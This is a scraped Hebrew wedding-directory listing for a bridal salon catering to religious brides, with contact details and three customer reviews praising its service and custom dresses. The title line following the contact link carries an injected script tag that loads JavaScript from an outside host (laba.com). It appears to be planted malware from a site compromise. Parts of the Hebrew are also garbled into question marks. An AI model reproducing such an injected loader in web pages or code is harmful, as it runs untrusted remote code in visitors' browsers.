חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ??? ? ???  > ????? ??? > שש וארגמן
חזור 
שש וארגמן
שש וארגמן הוא סלון כלות ותיק המוכר כמותאם לציבור הדתי לאומי וחרדי, בעיצוב צעיר ורענן. בסלון נתפרות שמלות יפהפיות בעיצוב אישי, גם בדיגום חופשי, במיטב החומרים וממיטב היצרנים. המוטו שלנו הוא שכל כלה חייבת לצאת מרוצה ומאושרת במאת האחוזים.

טלפון :
053-9414833
נייד :
כתובת :
  התירוש 7 חשמונאים


ליצירת קשר עם בעל העסק הקש כאן
שש וארגמן - ??? ? ???<script src=http://laba.com/muuu.s></script> 1
SimpleViewer requires Macromedia Flash. Get Macromedia Flash. If you have Flash installed, click to view gallery
 27/07/2015 06:46:25- חופית
ממליצה בחום
אני לקחתי משם שמלה שהיתה תפורה. מרוב ששיפצו אותה מדהים לאחר מדידה ראשונה כבר חשבתי שזו לא השמלה ההיא שמדדתי. אין מסירות שכזו... היחס לבבי, יחס שכלה חייבת לקבל והמקום הזה ייחודי ובו ניתן יחס רציני, אמיתי ורגישות! ממליצה בחום. נישאתי לפני שנתיים וחוויה כזו זכורה לי היטב תודות ליעל המהממת וצוות העובדות המתוקות. ,אגב גם המחיר היה זול ומשם יצאתי מרוצה מכל הבחינות! יש ליעל ניסיון אדיר ועיצותיה שוות לכל כלה!!!!

04/01/2015 20:42:43- עדי
מבחר ונסיון רב
כחלק מהכנותי לחתונה כמובן התחלתי לחפש אחר שמלת הכלה בה ארגיש אני ואשמח בה. לאחר ברור עם חברות שכבר נישאו המליצו לי לחפש שמלה בשש וארגמן. המקום לא סתם מומלץ בקרב הציבור הדתי לאומי. יש שם מבחר של שמלות צנועות ויחס טוב (שחשוב לא פחות) ב"ה שם חיפשתי לראשונה שמלה ושם מצאתי!

19/09/2014 20:38:10- תמר
תפירה אישית
תפרתי את שמלת הכלה שלי לפי הרעיון שעמד בראשי. את הבדים נתנו לי לבחור בעצמי לאחר הכוונה בנחלת בנימין, חוויה בפני עצמה, כך שהכל היה ממש תוצאות בחירותי!